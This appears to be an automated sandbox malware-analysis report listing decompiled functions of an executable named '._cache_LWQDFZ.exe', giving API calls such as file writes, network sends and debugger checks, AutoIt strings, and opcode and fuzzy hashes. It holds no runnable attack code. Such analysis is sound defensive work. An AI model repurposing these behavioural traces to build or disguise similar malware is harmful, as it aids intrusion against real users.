                                                                                                                        • Part of subcall function 003A3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,004622E8,?), ref: 003A3B65
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 2727075218-3081909835
                                                                                                                      • Opcode ID: 0ee89d062dfceab4ebf7e4f25bbd540f599ca837422487cb7061341628f59dc6
                                                                                                                      • Instruction ID: e2ecb2150fae0ceb624892291ef19c4ae9da1b1e3d34e59fe04dc53bebc977a0
                                                                                                                      • Opcode Fuzzy Hash: 0ee89d062dfceab4ebf7e4f25bbd540f599ca837422487cb7061341628f59dc6
                                                                                                                      • Instruction Fuzzy Hash: B3118D71A10198ABCF06DF94D8056DEBBF9EF46705F04801EF801BB241DBB956498BA5
                                                                                                                      Function 003E30AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: "F
                                                                                                                      • API String ID: 4104443479-3694933529
                                                                                                                      • Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                      • Instruction ID: cec3a74a029a8af469c833c76d4c398d89a57ce99f965de66b70a51a2effb724
                                                                                                                      • Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                      • Instruction Fuzzy Hash: F901D636200265ABCB199F2DC8919AB77A9EFC5314714812EE50ACF245D631E901C790
                                                                                                                      Function 003A34C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 004134AA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                      • API String ID: 1029625771-2684727018
                                                                                                                      • Opcode ID: 5e8b749440fc97aceb3e3ef7377aaa1a1f1d69aed0bd2c2f1af58222be055853
                                                                                                                      • Instruction ID: 226d8ded0c8f5ebd755e3a8bb42c1880e057acc176f18ef1609242320ff282d3
                                                                                                                      • Opcode Fuzzy Hash: 5e8b749440fc97aceb3e3ef7377aaa1a1f1d69aed0bd2c2f1af58222be055853
                                                                                                                      • Instruction Fuzzy Hash: EDF01872D0520DAE9F12EFB5D851DFFB77CEA15310F208526F81696181EB349B09DB21
                                                                                                                      Function 003E6852 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,003E685E,?,?,?,00414A5C,0043E448,00000003,?,?), ref: 003E66E2
                                                                                                                      • WriteFile.KERNEL32(?,?,"F,00000000,00000000,?,?,?,00414A5C,0043E448,00000003,?,?,003A4C44,?,?), ref: 003E686C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$PointerWrite
                                                                                                                      • String ID: "F
                                                                                                                      • API String ID: 539440098-3694933529
                                                                                                                      • Opcode ID: 5fa5c9520f36c6b0ad59bc9f5ad8b661a8cc4681a5a5ee82b4870fd1f3e3d1a9
                                                                                                                      • Instruction ID: b2a764d051b30f6e5cb37c88b8b167ffcd0647c7ed3b3c5ce0f12c5cc58f772b
                                                                                                                      • Opcode Fuzzy Hash: 5fa5c9520f36c6b0ad59bc9f5ad8b661a8cc4681a5a5ee82b4870fd1f3e3d1a9
                                                                                                                      • Instruction Fuzzy Hash: FBE04636400218BBDB20AF94D801A8ABBB8EB04350F10051AF94295050D7B5AA149BA4
                                                                                                                      Function 003DE390 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003A1952
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003DE3AA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 1777923405-2594219639
                                                                                                                      • Opcode ID: 9d2e6813e966f2517e8bb93bf66660d056a5032529717d815ef737eb369f5ccf
                                                                                                                      • Instruction ID: 05e716fd803e19091f677a24182e7bd5727a28b9d4e31a1848d7a3f2cfcf6b85
                                                                                                                      • Opcode Fuzzy Hash: 9d2e6813e966f2517e8bb93bf66660d056a5032529717d815ef737eb369f5ccf
                                                                                                                      • Instruction Fuzzy Hash: 2CD01235244110AAFA716B14FD06FD17B92DB41750F12046EB5806B1E5C7D25C419584
                                                                                                                      Function 003BF461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a2de04b9bef25b0b45a1c8b55817ba9b7b5072747aa3136326e1faf997f43921
                                                                                                                      • Instruction ID: a82e523f3020d6a9fcae2a83c210d72b502fa9082c80a77938fbc3706d9d9a9c
                                                                                                                      • Opcode Fuzzy Hash: a2de04b9bef25b0b45a1c8b55817ba9b7b5072747aa3136326e1faf997f43921
                                                                                                                      • Instruction Fuzzy Hash: D65191316043018FCB15EF29C891BEAB7E5AF89314F14856EF9968F692CB30E845CB51
                                                                                                                      Function 003F8065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 003F8074
                                                                                                                      • GetForegroundWindow.USER32 ref: 003F807A
                                                                                                                        • Part of subcall function 003F6B19: GetWindowRect.USER32(?,?), ref: 003F6B2C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CursorForegroundRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1066937146-0
                                                                                                                      • Opcode ID: 1069f1db75d6aaaf50a65d815562a14f5e797487f1b551f15d71f43a0c28a895
                                                                                                                      • Instruction ID: 9572e172e966b14c7deb6e794679aedb118fe29af864fa2cb658c4eabb16f112
                                                                                                                      • Opcode Fuzzy Hash: 1069f1db75d6aaaf50a65d815562a14f5e797487f1b551f15d71f43a0c28a895
                                                                                                                      • Instruction Fuzzy Hash: 80315B75A00118AFDF16DFA4CC81AFEB7B4FF05314F10452AE945AB251DB34AE45CB50
                                                                                                                      Function 003A1DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(00000000), ref: 0041DB31
                                                                                                                      • IsWindow.USER32(00000000), ref: 0041DB6B
                                                                                                                        • Part of subcall function 003A1F04: GetForegroundWindow.USER32 ref: 003A1FBE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Foreground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 62970417-0
                                                                                                                      • Opcode ID: 2e6d4fa61e28cd85ef8f4d7b23ba3cad6946fb21ea9b35adf23a6fdfd5cf6385
                                                                                                                      • Instruction ID: 4834a16a5b479e843c7f66c8513ef60df5277d3f75d78c974df2892b18886234
                                                                                                                      • Opcode Fuzzy Hash: 2e6d4fa61e28cd85ef8f4d7b23ba3cad6946fb21ea9b35adf23a6fdfd5cf6385
                                                                                                                      • Instruction Fuzzy Hash: 022190B2600206AADB26AF75C845FFFB7A9DF82784F014429F95B8B141DB74ED01D760
                                                                                                                      Function 003A3682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • 74BFC8D0.UXTHEME ref: 003A36E6
                                                                                                                        • Part of subcall function 003C2025: __lock.LIBCMT ref: 003C202B
                                                                                                                        • Part of subcall function 003A32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 003A32F6
                                                                                                                        • Part of subcall function 003A32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003A330B
                                                                                                                        • Part of subcall function 003A374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 003A376D
                                                                                                                        • Part of subcall function 003A374E: IsDebuggerPresent.KERNEL32(?,?), ref: 003A377F
                                                                                                                        • Part of subcall function 003A374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_LWQDFZ.exe,00000104,?,00461120,C:\Users\user\Desktop\._cache_LWQDFZ.exe,00461124,?,?), ref: 003A37EE
                                                                                                                        • Part of subcall function 003A374E: SetCurrentDirectoryW.KERNEL32(?), ref: 003A3860
                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 003A3726
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3809921791-0
                                                                                                                      • Opcode ID: be985e0b4e32572acb90ed8c367d57dfd5e4ce05a01189ceb89ef6cf9a0fe610
                                                                                                                      • Instruction ID: 4727a52d637f03c1aca27ee0eab4248ba593ab1c7418cad69531dfd256f6c0da
                                                                                                                      • Opcode Fuzzy Hash: be985e0b4e32572acb90ed8c367d57dfd5e4ce05a01189ceb89ef6cf9a0fe610
                                                                                                                      • Instruction Fuzzy Hash: AF11CD719083419BC711DF29ED4594AFBE8FF85710F004A2FF884872B1EBB19980CB9A
                                                                                                                      Function 003A4B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,003A4C2B,?,?,?,?,003ABE63), ref: 003A4BB6
                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,003A4C2B,?,?,?,?,003ABE63), ref: 00414972
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 919efc53e760fa7f4dd07e2682b398e1deffa067ffedde59401bac2f256686f7
                                                                                                                      • Instruction ID: 374057bd978a73acce873f95edcede112e8eff4a2948ce1f533f3a094eaaf6bf
                                                                                                                      • Opcode Fuzzy Hash: 919efc53e760fa7f4dd07e2682b398e1deffa067ffedde59401bac2f256686f7
                                                                                                                      • Instruction Fuzzy Hash: 4F019270244308BEF3354E24CC8AF663BDCEB46768F108319BAE45A1E0C6F45C458B24
                                                                                                                      Function 003BF26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,003EAEA5,?,?,00000000,00000008), ref: 003BF282
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,003EAEA5,?,?,00000000,00000008), ref: 003BF2A6
                                                                                                                        • Part of subcall function 003BF2D0: _memmove.LIBCMT ref: 003BF307
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3033907384-0
                                                                                                                      • Opcode ID: 925d0dfb8063db42a4d5cb63133acdeedd3f5657370fa0e7ddb86c1e4dcfb477
                                                                                                                      • Instruction ID: d0ebfc716ea5fac774d7141648b98c727b80003aa9b65b0f887abfeec04bb3f1
                                                                                                                      • Opcode Fuzzy Hash: 925d0dfb8063db42a4d5cb63133acdeedd3f5657370fa0e7ddb86c1e4dcfb477
                                                                                                                      • Instruction Fuzzy Hash: 25F04FBA504114BFAB16AB65DC44DBB7FADEF8A3647408426FE08CE515CA31DC018774
                                                                                                                      Function 003CF782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ___lock_fhandle.LIBCMT ref: 003CF7D9
                                                                                                                      • __close_nolock.LIBCMT ref: 003CF7F2
                                                                                                                        • Part of subcall function 003C886A: __getptd_noexit.LIBCMT ref: 003C886A
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1046115767-0
                                                                                                                      • Opcode ID: bb67e52905545ac3b4931a286d76a6ed7d60b1ab92af3e989ab34cf61a5c613c
                                                                                                                      • Instruction ID: cf8dbf490989639535942dfdeca42117201de09a5bb631a95cc28f966375d84d
                                                                                                                      • Opcode Fuzzy Hash: bb67e52905545ac3b4931a286d76a6ed7d60b1ab92af3e989ab34cf61a5c613c
                                                                                                                      • Instruction Fuzzy Hash: D111C272805B148ED7137F64D842B597A625F41331F66036CE920DF1E3CBB89E018BA5
                                                                                                                      Function 003A34F3 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003A352A
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • _wcscat.LIBCMT ref: 004166C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FullNamePath_memmove_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 257928180-0
                                                                                                                      • Opcode ID: 4f35c80d8c1d8e47b10e304dd71b5634beff20aa9d70a4769dfaa430f9ee3d74
                                                                                                                      • Instruction ID: 3c18c1d1d3413175b7a8160ccc6d1c35bae0d566066c1dde9c9ce034d5ec7307
                                                                                                                      • Opcode Fuzzy Hash: 4f35c80d8c1d8e47b10e304dd71b5634beff20aa9d70a4769dfaa430f9ee3d74
                                                                                                                      • Instruction Fuzzy Hash: E901C43190410C9ACB01EBA4C846EDA73BCEF16348F0041A6B915D71A0EF309B858B95
                                                                                                                      Function 003F9500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • send.WS2_32(00000000,?,00000000,00000000), ref: 003F9534
                                                                                                                      • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 003F9557
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
